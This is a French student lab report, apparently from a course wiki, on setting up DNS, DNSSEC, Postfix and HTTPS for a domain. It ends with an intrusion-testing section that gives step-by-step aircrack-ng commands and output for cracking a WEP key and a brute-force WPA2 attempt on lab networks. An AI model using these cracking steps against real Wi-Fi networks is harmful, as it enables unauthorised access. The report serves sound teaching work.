&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. &lt;br /&gt;
&lt;br /&gt;
Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK).&lt;br /&gt;
&lt;br /&gt;
Puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
